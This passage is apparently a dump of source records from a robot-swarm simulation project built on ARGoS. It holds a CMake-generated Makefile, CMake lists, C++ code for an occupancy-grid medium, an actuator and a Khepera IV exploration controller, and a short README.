\"ci_occupancy_actuator.h\"\n\nCCI_OccupancyActuator::CCI_OccupancyActuator():\n m_unStrength(255),\n bLayingPheromone(false){}\n\n#ifdef ARGOS_WITH_LUA\n void CCI_OccupancyActuator::CreateLuaState(lua_State* pt_lua_state){ }\n#endif" }, { "alpha_fraction": 0.7433818578720093, "alphanum_fraction": 0.7447494268417358, "avg_line_length": 36.4945068359375, "blob_id": "8ecc08d513d777218df94b04dc35f1d363fe5dca", "content_id": "8ad0410d24b0fe6af0d8fa16da6db8a3ab5a5584", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 10237, "license_type": "no_license", "max_line_length": 258, "num_lines": 273, "path": "/ugv_diffusion_occupancy/plugins/simulator/media/Makefile", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "# CMAKE generated file: DO NOT EDIT!\n# Generated by \"Unix Makefiles\" Generator, CMake Version 3.5\n\n# Default target executed when no arguments are given to make.\ndefault_target: all\n\n.PHONY : default_target\n\n# Allow only one \"make -f Makefile2\" at a time, but pass parallelism.\n.NOTPARALLEL:\n\n\n#=============================================================================\n# Special targets provided by cmake.\n\n# Disable implicit rules so canonical targets will work.\n.SUFFIXES:\n\n\n# Remove some rules from gmake that .SUFFIXES does not remove.\nSUFFIXES =\n\n.SUFFIXES: .hpux_make_needs_suffix_list\n\n\n# Suppress display of executed commands.\n$(VERBOSE).SILENT:\n\n\n# A target that is always out of date.\ncmake_force:\n\n.PHONY : cmake_force\n\n#=============================================================================\n# Set environment variables for the build.\n\n# The shell in which to execute make rules.\nSHELL = /bin/sh\n\n# The CMake executable.\nCMAKE_COMMAND = /usr/bin/cmake\n\n# The command to remove a file.\nRM = /usr/bin/cmake -E remove -f\n\n# Escaping for special characters.\nEQUALS = =\n\n# The top-level source directory on which CMake was run.\nCMAKE_SOURCE_DIR = /home/tjrobbins/swarm-mqp/ugv_diffusion_occupancy\n\n# The top-level build directory on which CMake was run.\nCMAKE_BINARY_DIR = /home/tjrobbins/swarm-mqp/ugv_diffusion_occupancy\n\n#=============================================================================\n# Targets provided globally by CMake.\n\n# Special rule for the target install\ninstall: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Install the project...\"\n\t/usr/bin/cmake -P cmake_install.cmake\n.PHONY : install\n\n# Special rule for the target install\ninstall/fast: preinstall/fast\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Install the project...\"\n\t/usr/bin/cmake -P cmake_install.cmake\n.PHONY : install/fast\n\n# Special rule for the target list_install_components\nlist_install_components:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Available install components are: \\\"Unspecified\\\"\"\n.PHONY : list_install_components\n\n# Special rule for the target list_install_components\nlist_install_components/fast: list_install_components\n\n.PHONY : list_install_components/fast\n\n# Special rule for the target rebuild_cache\nrebuild_cache:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Running CMake to regenerate build system...\"\n\t/usr/bin/cmake -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR)\n.PHONY : rebuild_cache\n\n# Special rule for the target rebuild_cache\nrebuild_cache/fast: rebuild_cache\n\n.PHONY : rebuild_cache/fast\n\n# Special rule for the target install/strip\ninstall/strip: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Installing the project stripped...\"\n\t/usr/bin/cmake -DCMAKE_INSTALL_DO_STRIP=1 -P cmake_install.cmake\n.PHONY : install/strip\n\n# Special rule for the target install/strip\ninstall/strip/fast: install/strip\n\n.PHONY : install/strip/fast\n\n# Special rule for the target install/local\ninstall/local: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Installing only the local directory...\"\n\t/usr/bin/cmake -DCMAKE_INSTALL_LOCAL_ONLY=1 -P cmake_install.cmake\n.PHONY : install/local\n\n# Special rule for the target install/local\ninstall/local/fast: install/local\n\n.PHONY : install/local/fast\n\n# Special rule for the target edit_cache\nedit_cache:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Running CMake cache editor...\"\n\t/usr/bin/ccmake -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR)\n.PHONY : edit_cache\n\n# Special rule for the target edit_cache\nedit_cache/fast: edit_cache\n\n.PHONY : edit_cache/fast\n\n# The main all target\nall: cmake_check_build_system\n\tcd /home/tjrobbins/swarm-mqp/ugv_diffusion_occupancy && $(CMAKE_COMMAND) -E cmake_progress_start /home/tjrobbins/swarm-mqp/ugv_diffusion_occupancy/CMakeFiles /home/tjrobbins/swarm-mqp/ugv_diffusion_occupancy/plugins/simulator/media/CMakeFiles/progress.marks\n\tcd /home/tjrobbins/swarm-mqp/ugv_diffusion_occupancy && $(MAKE) -f CMakeFiles/Makefile2 plugins/simulator/media/all\n\t$(CMAKE_COMMAND) -E cmake_progress_start /home/tjrobbins/swarm-mqp/ugv_diffusion_occupancy/CMakeFiles 0\n.PHONY : all\n\n# The main clean target\nclean:\n\tcd /home/tjrobbins/swarm-mqp/ugv_diffusion_occupancy && $(MAKE) -f CMakeFiles/Makefile2 plugins/simulator/media/clean\n.PHONY : clean\n\n# The main clean target\nclean/fast: clean\n\n.PHONY : clean/fast\n\n# Prepare targets for installation.\npreinstall: all\n\tcd /home/tjrobbins/swarm-mqp/ugv_diffusion_occupancy && $(MAKE) -f CMakeFiles/Makefile2 plugins/simulator/media/preinstall\n.PHONY : preinstall\n\n# Prepare targets for installation.\npreinstall/fast:\n\tcd /home/tjrobbins/swarm-mqp/ugv_diffusion_occupancy && $(MAKE) -f CMakeFiles/Makefile2 plugins/simulator/media/preinstall\n.PHONY : preinstall/fast\n\n# clear depends\ndepend:\n\tcd /home/tjrobbins/swarm-mqp/ugv_diffusion_occupancy && $(CMAKE_COMMAND) -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR) --check-build-system CMakeFiles/Makefile.cmake 1\n.PHONY : depend\n\n# Convenience name for target.\nplugins/simulator/media/CMakeFiles/occupancy_medium.dir/rule:\n\tcd /home/tjrobbins/swarm-mqp/ugv_diffusion_occupancy && $(MAKE) -f CMakeFiles/Makefile2 plugins/simulator/media/CMakeFiles/occupancy_medium.dir/rule\n.PHONY : plugins/simulator/media/CMakeFiles/occupancy_medium.dir/rule\n\n# Convenience name for target.\noccupancy_medium: plugins/simulator/media/CMakeFiles/occupancy_medium.dir/rule\n\n.PHONY : occupancy_medium\n\n# fast build rule for target.\noccupancy_medium/fast:\n\tcd /home/tjrobbins/swarm-mqp/ugv_diffusion_occupancy && $(MAKE) -f plugins/simulator/media/CMakeFiles/occupancy_medium.dir/build.make plugins/simulator/media/CMakeFiles/occupancy_medium.dir/build\n.PHONY : occupancy_medium/fast\n\n# Convenience name for target.\nplugins/simulator/media/CMakeFiles/occupancy_medium_automoc.dir/rule:\n\tcd /home/tjrobbins/swarm-mqp/ugv_diffusion_occupancy && $(MAKE) -f CMakeFiles/Makefile2 plugins/simulator/media/CMakeFiles/occupancy_medium_automoc.dir/rule\n.PHONY : plugins/simulator/media/CMakeFiles/occupancy_medium_automoc.dir/rule\n\n# Convenience name for target.\noccupancy_medium_automoc: plugins/simulator/media/CMakeFiles/occupancy_medium_automoc.dir/rule\n\n.PHONY : occupancy_medium_automoc\n\n# fast build rule for target.\noccupancy_medium_automoc/fast:\n\tcd /home/tjrobbins/swarm-mqp/ugv_diffusion_occupancy && $(MAKE) -f plugins/simulator/media/CMakeFiles/occupancy_medium_automoc.dir/build.make plugins/simulator/media/CMakeFiles/occupancy_medium_automoc.dir/build\n.PHONY : occupancy_medium_automoc/fast\n\noccupancy_medium.o: occupancy_medium.cpp.o\n\n.PHONY : occupancy_medium.o\n\n# target to build an object file\noccupancy_medium.cpp.o:\n\tcd /home/tjrobbins/swarm-mqp/ugv_diffusion_occupancy && $(MAKE) -f plugins/simulator/media/CMakeFiles/occupancy_medium.dir/build.make plugins/simulator/media/CMakeFiles/occupancy_medium.dir/occupancy_medium.cpp.o\n.PHONY : occupancy_medium.cpp.o\n\noccupancy_medium.i: occupancy_medium.cpp.i\n\n.PHONY : occupancy_medium.i\n\n# target to preprocess a source file\noccupancy_medium.cpp.i:\n\tcd /home/tjrobbins/swarm-mqp/ugv_diffusion_occupancy && $(MAKE) -f plugins/simulator/media/CMakeFiles/occupancy_medium.dir/build.make plugins/simulator/media/CMakeFiles/occupancy_medium.dir/occupancy_medium.cpp.i\n.PHONY : occupancy_medium.cpp.i\n\noccupancy_medium.s: occupancy_medium.cpp.s\n\n.PHONY : occupancy_medium.s\n\n# target to generate assembly for a file\noccupancy_medium.cpp.s:\n\tcd /home/tjrobbins/swarm-mqp/ugv_diffusion_occupancy && $(MAKE) -f plugins/simulator/media/CMakeFiles/occupancy_medium.dir/build.make plugins/simulator/media/CMakeFiles/occupancy_medium.dir/occupancy_medium.cpp.s\n.PHONY : occupancy_medium.cpp.s\n\noccupancy_medium_automoc.o: occupancy_medium_automoc.cpp.o\n\n.PHONY : occupancy_medium_automoc.o\n\n# target to build an object file\noccupancy_medium_automoc.cpp.o:\n\tcd /home/tjrobbins/swarm-mqp/ugv_diffusion_occupancy && $(MAKE) -f plugins/simulator/media/CMakeFiles/occupancy_medium.dir/build.make plugins/simulator/media/CMakeFiles/occupancy_medium.dir/occupancy_medium_automoc.cpp.o\n.PHONY : occupancy_medium_automoc.cpp.o\n\noccupancy_medium_automoc.i: occupancy_medium_automoc.cpp.i\n\n.PHONY : occupancy_medium_automoc.i\n\n# target to preprocess a source file\noccupancy_medium_automoc.cpp.i:\n\tcd /home/tjrobbins/swarm-mqp/ugv_diffusion_occupancy && $(MAKE) -f plugins/simulator/media/CMakeFiles/occupancy_medium.dir/build.make plugins/simulator/media/CMakeFiles/occupancy_medium.dir/occupancy_medium_automoc.cpp.i\n.PHONY : occupancy_medium_automoc.cpp.i\n\noccupancy_medium_automoc.s: occupancy_medium_automoc.cpp.s\n\n.PHONY : occupancy_medium_automoc.s\n\n# target to generate assembly for a file\noccupancy_medium_automoc.cpp.s:\n\tcd /home/tjrobbins/swarm-mqp/ugv_diffusion_occupancy && $(MAKE) -f plugins/simulator/media/CMakeFiles/occupancy_medium.dir/build.make plugins/simulator/media/CMakeFiles/occupancy_medium.dir/occupancy_medium_automoc.cpp.s\n.PHONY : occupancy_medium_automoc.cpp.s\n\n# Help Target\nhelp:\n\t@echo \"The following are some of the valid targets for this Makefile:\"\n\t@echo \"... all (the default if no target is provided)\"\n\t@echo \"... clean\"\n\t@echo \"... depend\"\n\t@echo \"... install\"\n\t@echo \"... list_install_components\"\n\t@echo \"... rebuild_cache\"\n\t@echo \"... occupancy_medium\"\n\t@echo \"... install/strip\"\n\t@echo \"... install/local\"\n\t@echo \"... edit_cache\"\n\t@echo \"... occupancy_medium_automoc\"\n\t@echo \"... occupancy_medium.o\"\n\t@echo \"... occupancy_medium.i\"\n\t@echo \"... occupancy_medium.s\"\n\t@echo \"... occupancy_medium_automoc.o\"\n\t@echo \"... occupancy_medium_automoc.i\"\n\t@echo \"... occupancy_medium_automoc.s\"\n.PHONY : help\n\n\n\n#=============================================================================\n# Special targets to cleanup operation of make.\n\n# Special rule to run CMake to check the build system integrity.\n# No rule that depends on this can have commands that come from listfiles\n# because they might be regenerated.\ncmake_check_build_system:\n\tcd /home/tjrobbins/swarm-mqp/ugv_diffusion_occupancy && $(CMAKE_COMMAND) -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR) --check-build-system CMakeFiles/Makefile.cmake 0\n.PHONY : cmake_check_build_system\n\n" }, { "alpha_fraction": 0.6619032025337219, "alphanum_fraction": 0.667749285697937, "avg_line_length": 37.5, "blob_id": "f7f94a93b772138bd469d1c7ad12e3616b1ea36e", "content_id": "97abf19fa7baed9c07e1d94dfdb0cd2c0901f584", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3079, "license_type": "no_license", "max_line_length": 103, "num_lines": 80, "path": "/ugv_exploration/plugins/controllers/kheperaiv_exploration/kheperaiv_exploration_controller.cpp", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "/* Include the controller definition */\n#include \"kheperaiv_exploration_controller.h\"\n#include <octomap_manager.h>\n/* Function definitions for XML parsing */\n#include <argos3/core/utility/configuration/argos_configuration.h>\n/* 2D vector definition */\n#include <argos3/core/utility/math/vector2.h>\n/* Definition of ultrasound implementation */\n#include <argos3/plugins/robots/kheperaiv/simulator/kheperaiv_ultrasound_default_sensor.h>\n/* Definition of ultrasound interface */\n#include <argos3/plugins/robots/kheperaiv/control_interface/ci_kheperaiv_ultrasound_sensor.h>\n/**/\n#include <argos3/core/utility/logging/argos_log.h>\n#include <argos3/plugins/robots/kheperaiv/simulator/kheperaiv_measures.h>\n#include <math.h>\n#include <argos3/core/control_interface/ci_sensor.h>\n\n#include <argos3/core/control_interface/ci_sensor.h>\n#include <argos3/core/utility/math/angles.h>\n\n\n\ntypedef CCI_KheperaIVUltrasoundSensor::TReadings TReadings;\ntypedef struct CCI_KheperaIVUltrasoundSensor::SReading SReading;\n/****************************************/\n/****************************************/\n\nCKheperaExploration::CKheperaExploration() :\n m_pcWheels(NULL),\n m_pcUltrasoundSensor(NULL),\n m_cAlpha(10.0f),\n m_fDelta(0.5f),\n m_fWheelVelocity(2.5f),\n m_cGoStraightAngleRange(-ToRadians(m_cAlpha),\n ToRadians(m_cAlpha)),\n m_localMap(octomap::OcTree(OCTCELLSIZE)),\n m_localScan(octomap::Pointcloud()),\n m_state(UGV_State::SCAN){}\n\n/****************************************/\n/****************************************/\n\nvoid CKheperaExploration::Init(TConfigurationNode& t_node) {\n m_pcWheels = GetActuator<CCI_DifferentialSteeringActuator >(\"differential_steering\");\n m_pcUltrasoundSensor = GetSensor <CCI_KheperaIVUltrasoundSensor >(\"kheperaiv_ultrasound\" );\n m_pcProximity = GetSensor <CCI_KheperaIVProximitySensor >(\"kheperaiv_proximity\" );\n m_pcPosition = GetSensor <CCI_PositioningSensor >(\"positioning\");\n\n GetNodeAttributeOrDefault(t_node, \"alpha\", m_cAlpha, m_cAlpha);\n m_cGoStraightAngleRange.Set(-ToRadians(m_cAlpha), ToRadians(m_cAlpha));\n GetNodeAttributeOrDefault(t_node, \"delta\", m_fDelta, m_fDelta);\n GetNodeAttributeOrDefault(t_node, \"velocity\", m_fWheelVelocity, m_fWheelVelocity);\n}\n\n/****************************************/\n/****************************************/\n\nvoid CKheperaExploration::ControlStep() {\n switch(m_state) {\n case UGV_State::SCAN:\n break;\n default:\n break;\n }\n}\n\n/****************************************/\n/****************************************/\n\n/*\n * This statement notifies ARGoS of the existence of the controller.\n * It binds the class passed as first argument to the string passed as\n * second argument.\n * The string is then usable in the configuration file to refer to this\n * controller.\n * When ARGoS reads that string in the configuration file, it knows which\n * controller class to instantiate.\n * See also the configuration files for an example of how this is used.\n */\nREGISTER_CONTROLLER(CKheperaExploration, \"kheperaiv_exploration_controller\")" }, { "alpha_fraction": 0.8608695864677429, "alphanum_fraction": 0.8608695864677429, "avg_line_length": 28, "blob_id": "6a9fbf6b1e02cbcd20eff3dea76110863cc08134", "content_id": "c153fa32c28094519ba42114460f87b5c350524a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 115, "license_type": "no_license", "max_line_length": 32, "num_lines": 4, "path": "/ugv_diffusion_occupancy/plugins/CMakeLists.txt", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "add_subdirectory(simulator)\nadd_subdirectory(robots)\nadd_subdirectory(controllers)\nadd_subdirectory(loop_functions)" }, { "alpha_fraction": 0.7941176295280457, "alphanum_fraction": 0.7941176295280457, "avg_line_length": 29.22222137451172, "blob_id": "348c87115795e5c7cae057e8c387f781695e25b6", "content_id": "63e375da99603465bc8924c9f75abbee2cd839ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 272, "license_type": "no_license", "max_line_length": 88, "num_lines": 9, "path": "/ugv_diffusion_occupancy/plugins/controllers/kheperaiv_occupancy/CMakeFiles/kheperaiv_occupancy_automoc.dir/cmake_clean.cmake", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "file(REMOVE_RECURSE\n \"kheperaiv_occupancy_automoc.cpp\"\n \"CMakeFiles/kheperaiv_occupancy_automoc\"\n)\n\n# Per-language clean rules from dependency scanning.\nforeach(lang )\n include(CMakeFiles/kheperaiv_occupancy_automoc.dir/cmake_clean_${lang}.cmake OPTIONAL)\nendforeach()\n" }, { "alpha_fraction": 0.821561336517334, "alphanum_fraction": 0.8289963006973267, "avg_line_length": 48, "blob_id": "7d88af311854fd921a30d8eaead63971b854ab09", "content_id": "ef162e1a64044eae6ead798ed942975fd6e193f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 538, "license_type": "no_license", "max_line_length": 98, "num_lines": 11, "path": "/ugv_diffusion_occupancy/plugins/controllers/epuck_obstacleavoidance/CMakeLists.txt", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "add_library(epuck_obstacleavoidance SHARED epuck_obstacleavoidance.h epuck_obstacleavoidance.cpp)\ntarget_link_libraries(epuck_obstacleavoidance\n argos3core_simulator\n argos3plugin_simulator_epuck\n argos3plugin_simulator_genericrobot\n argos3plugin_simulator_generic_occupancy)\n\ninstall(TARGETS epuck_obstacleavoidance DESTINATION ${CMAKE_BINARY_DIR}/lib)\n\nFILE(RELATIVE_PATH relative_dir ${CMAKE_SOURCE_DIR} ${CMAKE_CURRENT_SOURCE_DIR})\ninstall(FILES epuck_obstacleavoidance.h DESTINATION \"${CMAKE_BINARY_DIR}/include/${relative_dir}\")" }, { "alpha_fraction": 0.6726694703102112, "alphanum_fraction": 0.6832627058029175, "avg_line_length": 20.477272033691406, "blob_id": "f655dd0d594ecc35d85ab545e06eb4bbe0cb41d4", "content_id": "95d356fada1b9f0d011825a61919595cebf38b01", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 944, "license_type": "no_license", "max_line_length": 66, "num_lines": 44, "path": "/ugv_diffusion_occupancy/plugins/robots/generic/control_interface/ci_occupancy_actuator.h", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "#ifndef CI_OCCUPANCY_ACTUATOR_H\n#define CI_OCCUPANCY_ACTUATOR_H\n\n#include <argos3/core/control_interface/ci_actuator.h>\n#include <argos3/core/utility/logging/argos_log.h>\n\nusing namespace argos;\n\nclass CCI_OccupancyActuator : public CCI_Actuator{\npublic:\n\n CCI_OccupancyActuator();\n\n inline void SetStrength(const UInt16 un_strength){\n m_unStrength = un_strength;\n }\n\n inline UInt16 GetStrength(const UInt16 un_strength){\n return m_unStrength;\n }\n\n inline void SetLaying(const bool& b_laying){\n bLayingPheromone = b_laying;\n }\n\n inline bool GetLaying() const{\n return bLayingPheromone;\n }\n\n inline virtual void SetOccupancy(Real dist) {\n LOGERR << \"Using the cci set occupancy call\" << std::endl;\n }\n\n #ifdef ARGOS_WITH_LUA\n void CreateLuaState(lua_State* pt_lua_state) override;\n #endif\n\nprotected:\n bool bLayingPheromone;\n UInt16 m_unStrength;\n\n};\n\n#endif" }, { "alpha_fraction": 0.770963728427887, "alphanum_fraction": 0.7784730792045593, "avg_line_length": 24.80645179748535, "blob_id": "3cf5b447e60dbe2a402c7af72ecdab053917abcd", "content_id": "6a9a8f66c0cffd18623ce845ab57fce49efac9e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 799, "license_type": "no_license", "max_line_length": 86, "num_lines": 31, "path": "/ugv_diffusion_occupancy/plugins/loop_functions/occupancy_visualizer/occupancy_visualizer.h", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "#ifndef OCCUPANCY_QTUSER_FUNCTIONS_H\n#define OCCUPANCY_QTUSER_FUNCTIONS_H\n\n#include <argos3/plugins/simulator/visualizations/qt-opengl/qtopengl_user_functions.h>\n#include <plugins/simulator/media/occupancy_medium.h>\n#include <argos3/core/utility/math/quaternion.h>\n#include <argos3/core/utility/math/vector2.h>\n\n//#include <argos3/plugins/loop_functions/diffusion_visualizer/diffusion_visualizer.h>\n\nusing namespace argos;\n\nclass COccupancyQTUserFunctions : public CQTOpenGLUserFunctions {\n\npublic:\n\n COccupancyQTUserFunctions();\n\n void Init(TConfigurationNode& t_tree) override;\n\n void DrawInWorld() override;\n\nprivate:\n bool m_bDrawDiffusion;\n Real m_fGridSize;\n COccupancyMedium& m_cPheraMed;\n std::vector<CVector2> m_cSquarePoints;\n CQuaternion m_cOrientation;\n};\n\n#endif" }, { "alpha_fraction": 0.6343554854393005, "alphanum_fraction": 0.6387733817100525, "avg_line_length": 29.547618865966797, "blob_id": "afdbaa87f0ff35871e0339a71994e5aec4428ab5", "content_id": "652ce853af9cba34c7338d0494d5f2416958bc70", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3848, "license_type": "no_license", "max_line_length": 98, "num_lines": 126, "path": "/ugv_diffusion_occupancy/plugins/simulator/media/occupancy_medium.h", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "#ifndef OCCUPANCY_MEDIUM_H\n#define OCCUPANCY_MEDIUM_H\n\n#include <map>\n#include <functional>\n#include <cmath>\n\n#include <argos3/core/utility/math/vector3.h>\n#include <argos3/core/simulator/medium/medium.h>\n#include <argos3/core/utility/datatypes/datatypes.h>\n\nusing namespace argos;\n\n\n// used for PheromoneMap allowing vectors to be indicies\nstruct VectorCompare\n{\n bool operator() (const CVector2& lhs, const CVector2& rhs) const\n {\n if(lhs.GetX() == rhs.GetX()){\n return lhs.GetY() < rhs.GetY();\n }\n return lhs.GetX() < rhs.GetX();\n }\n};\n\nclass COccupancyMedium : public CMedium {\n\npublic:\n typedef std::map<CVector2, UInt16, VectorCompare> PheromoneMap;\n\n typedef std::function<void(UInt16&)> PheromoneUpdater;\n\n void Init(TConfigurationNode& t_tree) override;\n\n void PostSpaceInit() override;\n \n void Reset() override;\n \n void Destroy() override;\n \n void Update() override;\n\n\n /**\n * Converts a real position to the cell position, this can be \n * used for inserting elements into m_cPheromoneCells\n * @param c_position The real position.\n * @param b_ceil The coordinates rounds up.\n * @return The cell position.\n */\n CVector2 PositionToCellPosition(const CVector2& c_position) const;\n\n /**\n * Lays pheromone at the given position.\n * Internally PositionToCellPosition will be called, so the real position can be given.\n * @param c_position The position where you want to lay pheromone.\n */\n void SetOccupancy(const CVector2& c_position);\n\n // TODO: use true and false for bool params\n /**\n * Reads the pheromone levels around the given position.\n * Internally PositionToCellPosition will be called, so the real position can be given.\n * @param c_position The position around which to measure pheromone.\n * @param f_range The distance of cells to be returned \n * @param b_circle If enabled, a circle filter is used. Not yet implemented.\n * @returned A PheromoneMap of the local pheromone levels, with relative positions.\n */\n PheromoneMap ReadPheromone(const CVector2& c_position, const Real& f_range, \n const bool& b_circle=false) const;\n\n\n /**\n * @return The size of the cells\n */\n inline Real GetCellSize(){\n return m_fCellSize;\n }\n\n inline PheromoneMap GetPheromoneMap(){\n return m_cPheromoneCells;\n }\n\n /**\n * [SetLocalLevels description]\n * @param c_local_levels [description]\n * @param c_cell_key [description]\n * @param c_position [description]\n */\n void SetLocalLevels(COccupancyMedium::PheromoneMap& c_local_levels,\n const CVector2& c_cell_key,\n const CVector2& c_position)const;\n\n /**\n * Converts an real coordinate to a cell coordinate.\n * @param f_original_coordinate The original coordinate.\n * @param b_ceil Indicates that the coordinates should round up.\n * @return The cell coordinate.\n */\n inline Real ToCellDistance(const Real& f_original_coordinate, \n const bool& b_floor = true) const{\n if(b_floor)\n return floor(f_original_coordinate/m_fCellSize);\n return f_original_coordinate/m_fCellSize;\n }\n\n\nprivate:\n\n\n /** The dimension of the occupancy grid cell size */\n Real m_fCellSize;\n\n /** Function to update pheromone levels for a cell value*/\n PheromoneUpdater m_cPheromoneUpdater;\n\n /** \n * Keeps track of the occupancy values at certain positions. \n * Do not write to the map directly, first use \n * PositionToCellPosition to get valid cell positions.\n */\n PheromoneMap m_cPheromoneCells;\n};\n\n#endif" }, { "alpha_fraction": 0.7703016400337219, "alphanum_fraction": 0.7726218104362488, "avg_line_length": 27.799999237060547, "blob_id": "e08193247b2d8a588cb50c7f034c8ff3a41529d6", "content_id": "b6a698f7ba3f2cd08dd9448f82261793f7056fcf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 431, "license_type": "no_license", "max_line_length": 83, "num_lines": 15, "path": "/ugv_diffusion_occupancy/plugins/simulator/media/CMakeLists.txt", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "set(HEADERS\n occupancy_medium.h)\n\nset(SOURCES\n occupancy_medium.cpp)\n\nadd_library(occupancy_medium SHARED ${HEADERS} ${SOURCES})\n\ntarget_link_libraries(occupancy_medium\n argos3core_simulator)\n\ninstall(TARGETS occupancy_medium DESTINATION ${CMAKE_BINARY_DIR}/lib)\n\nFILE(RELATIVE_PATH relative_dir ${CMAKE_SOURCE_DIR} ${CMAKE_CURRENT_SOURCE_DIR})\ninstall(FILES ${HEADERS} DESTINATION \"${CMAKE_BINARY_DIR}/include/${relative_dir}\")" }, { "alpha_fraction": 0.8416289687156677, "alphanum_fraction": 0.8416289687156677, "avg_line_length": 36, "blob_id": "9f68602c6601e4d2918398a15613daa31fa1b1bc", "content_id": "90a7695587d990f7ae02132d2aae92fe57394d6c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 221, "license_type": "no_license", "max_line_length": 94, "num_lines": 6, "path": "/README.md", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "# swarm-mqp\nDevelopment of simulation for heterogeneous swarm.\n\nPython Functions:\n\tUsing OpenCV and Numpy for image processing\n\tStuehrmannfunctions.py contain functions for use in image processing and frame transformation" }, { "alpha_fraction": 0.740963876247406, "alphanum_fraction": 0.7469879388809204, "avg_line_length": 28.075000762939453, "blob_id": "1b4970623624bbd81b8e3562f885cfc27c7d71c6", "content_id": "b9d8cefb16d6f127533f134e3074a7b86789be49", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1162, "license_type": "no_license", "max_line_length": 69, "num_lines": 40, "path": "/ugv_diffusion_occupancy/plugins/robots/generic/simulator/occupancy_default_actuator.h", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "#ifndef OCCUPANCY_DEFAULT_ACTUATOR_H\n#define OCCUPANCY_DEFAULT_ACTUATOR_H\n\n#include <string>\n#include <map>\n#include <list>\n\n#include <argos3/core/simulator/actuator.h>\n#include <argos3/core/simulator/space/space.h>\n#include <argos3/core/simulator/entity/embodied_entity.h>\n#include <argos3/core/simulator/entity/composable_entity.h>\n#include <argos3/core/utility/math/vector2.h>\n#include \"../control_interface/ci_occupancy_actuator.h\"\n#include <plugins/simulator/media/occupancy_medium.h>\n\nusing namespace argos;\n\nclass COccupancyActuator : public CSimulatedActuator,\n public CCI_OccupancyActuator {\n\npublic:\n void SetRobot(CComposableEntity& c_entity) override;\n void Init(TConfigurationNode& t_tree) override;\n void Update() override;\n void Reset() override;\n void Destroy() override;\n void SetOccupancy(Real distance) override;\n\nprivate:\n\n /** Reference to embodied entity associated with this actuator */\n CEmbodiedEntity* m_pcEmbodiedEntity;\n /** Reference to pheromone medium associated with this actuator */\n COccupancyMedium* m_pCOccupancyMedium;\n\n std::list<CVector2> m_occupancy_list;\n\n};\n\n#endif" }, { "alpha_fraction": 0.5397769808769226, "alphanum_fraction": 0.5482032299041748, "avg_line_length": 30.53125, "blob_id": "2c495b0cbb459345fd4fe9c093eae9704dbfd02b", "content_id": "805664180259c1b64774816f0b115dea0eda0f87", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4035, "license_type": "no_license", "max_line_length": 95, "num_lines": 128, "path": "/ugv_diffusion_occupancy/plugins/simulator/media/occupancy_medium.cpp", "repo_name": "turnerjrobbins/swarm-mqp", "src_encoding": "UTF-8", "text": "#include \"occupancy_medium.h\"\n#include <argos3/core/utility/logging/argos_log.h>\n\n/****************************************/\n/****************************************/\n\nvoid COccupancyMedium::Init(TConfigurationNode& t_tree){\n CMedium::Init(t_tree);\n\n std::string strDecayOption(\"linear\");\n\n GetNodeAttributeOrDefault(t_tree, \"cell_size\", m_fCellSize, 0.1);\n\n}\n\n/****************************************/\n/****************************************/\n\nvoid COccupancyMedium::PostSpaceInit(){\n\n}\n\n/****************************************/\n/****************************************/\n\nvoid COccupancyMedium::Reset(){\n m_cPheromoneCells.clear();\n}\n\n/****************************************/\n/****************************************/\n\nvoid COccupancyMedium::Destroy(){\n\n}\n\n/****************************************/\n/****************************************/\n\nCVector2 COccupancyMedium::PositionToCellPosition(const CVector2& c_position) const{\n CVector2 cCellPosition;\n cCellPosition.SetX(ToCellDistance(c_position.GetX()));\n cCellPosition.SetY(ToCellDistance(c_position.GetY()));\n return cCellPosition;\n}\n\n/****************************************/\n/****************************************/\n\nvoid COccupancyMedium::Update(){\n // for(auto &pair: m_cPheromoneCells){\n // // update pheromone levels using callback chosen by Init\n // m_cPheromoneUpdater(pair.second);\n // // if pheromone level is 0 remove from map to make iteration quicker\n // if(pair.second == 0){\n // m_cPheromoneCells.erase(pair.first);\n // }\n // }\n}\n\n/****************************************/\n/****************************************/\nvoid 